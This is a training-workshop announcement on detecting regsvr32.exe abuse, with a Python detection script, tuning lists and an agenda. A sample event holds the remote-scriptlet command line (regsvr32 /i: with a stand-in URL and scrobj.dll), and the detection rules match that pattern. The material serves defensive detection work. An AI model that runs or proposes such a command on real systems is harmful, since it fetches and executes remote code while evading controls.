Watch SCYTHE's Technical Director, Tim Schulz, conduct a 90-minute Hands-On Purple Team Exercise Workshop!

Topic: Purple Process: RegSvr32.exe

Living off the Land Binaries and Scripts (LOLBAS) can be difficult for defenders to catch because these programs have legitimate uses in enterprise environments, so their execution alone is not a reliable signal. These techniques are an ideal fit for a purple team exercise, which can be used to:

1. Establish a baseline understanding of an organization’s ability to log and detect these actions
2. Build more resilient defenses by tuning these detections to decrease false positives

The SCYTHE Labs team will walk attendees through the process of building and executing a test for the regsvr32.exe procedure. By the end of this workshop, attendees will:

• Know how to build a test with regsvr32.exe as an execution method
• Walk away with some techniques for reducing false positives within an environment
• Gather metrics that are built into an executive report for purple team exercise readout
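As an added illustration of the detection-engineering half of the workshop (this is example code written for this page, not SCYTHE's tooling or part of the original announcement), the script below classifies constructed process-creation events for regsvr32.exe. It separates a high-confidence pattern that should never be allowlisted (the /i: switch pointing at a URL, or scrobj.dll being loaded) from a weaker signal (a DLL registered from outside trusted directories) that is tuned with a parent-process allowlist to reduce false positives, then rolls the results into the kind of counts a readout report would use. The sample events, the trusted-parent and trusted-directory lists, and the rule names are all assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed process-creation events (hypothetical telemetry, not real logs).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmd": r"regsvr32.exe /s /u /i:http://test.invalid/payload.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"regsvr32.exe /s C:\Users\Public\Downloads\update.dll"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "cmd": r"regsvr32.exe /s C:\Windows\System32\vbscript.dll"},
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"regsvr32.exe /s C:\Users\admin\AppData\Local\Temp\MSI1234.tmp\setup.dll"},
]

# Tuning knobs (assumed values): adjust these during the exercise to cut false positives.
TRUSTED_PARENTS = {
    "c:\\windows\\system32\\msiexec.exe",   # installers legitimately register DLLs
    "c:\\windows\\system32\\svchost.exe",
}
TRUSTED_DLL_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmd: str) -> list[str]:
    """Split a Windows command line into tokens, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmd)]


@dataclass
class Finding:
    rule: str
    severity: str   # "high", "medium" or "info" (info = suppressed by the allowlist)
    detail: str


def classify(event: dict) -> Optional[Finding]:
    """Return a Finding for a suspicious regsvr32 invocation, or None if benign."""
    tokens = tokenize(event["cmd"])
    if not tokens or not tokens[0].lower().endswith("regsvr32.exe"):
        return None
    args = [t.lower() for t in tokens[1:]]

    # Rule 1: remote scriptlet execution. High confidence, never allowlisted.
    for a in args:
        if a.startswith("/i:") and "://" in a:
            return Finding("regsvr32_remote_scriptlet", "high", f"/i: points at a URL: {a}")
    if any(a.endswith("scrobj.dll") for a in args):
        return Finding("regsvr32_scrobj", "high", "scrobj.dll loaded by regsvr32")

    # Rule 2: module registered from outside trusted directories. Weaker signal,
    # so a trusted parent process suppresses it to an informational record.
    modules = [a for a in args if not a.startswith("/") and a.endswith((".dll", ".ocx"))]
    for m in modules:
        if not m.startswith(TRUSTED_DLL_DIRS):
            if event["parent"].lower() in TRUSTED_PARENTS:
                return Finding("regsvr32_untrusted_dll_path", "info",
                               f"suppressed: trusted parent {event['parent']}")
            return Finding("regsvr32_untrusted_dll_path", "medium",
                           f"module outside trusted dirs: {m}")
    return None


def summarize(events: list[dict]) -> dict:
    """Counts per severity, the raw material for an exercise readout."""
    counts = {"events": len(events), "high": 0, "medium": 0, "info": 0, "benign": 0}
    for ev in events:
        finding = classify(ev)
        counts[finding.severity if finding else "benign"] += 1
    return counts


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev) or f"benign: {ev['cmd']}")
    print(summarize(SAMPLE_EVENTS))
```

Re-running the same sample set after each tuning change (adding a parent to TRUSTED_PARENTS, widening TRUSTED_DLL_DIRS) shows directly whether a false positive was removed without silencing the high-confidence rule, which is the validate step in the agenda.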

For more information about regsvr32 and our purple team process, check out the following:
LOLBAS Project Repository Page
MITRE ATT&CK: Regsvr32 T1218.010
Purple Team Exercise Framework

General Agenda (90 minutes total):
5 minutes of kickoff / introduction
10 minutes of lecture / background information
50 minutes of lab time:
  10 minutes of SCYTHE familiarization / test setup
  40 minutes of test / detection engineering / re-run to validate
10 minutes of executive briefing / reporting / metrics
15 minutes of Q&A

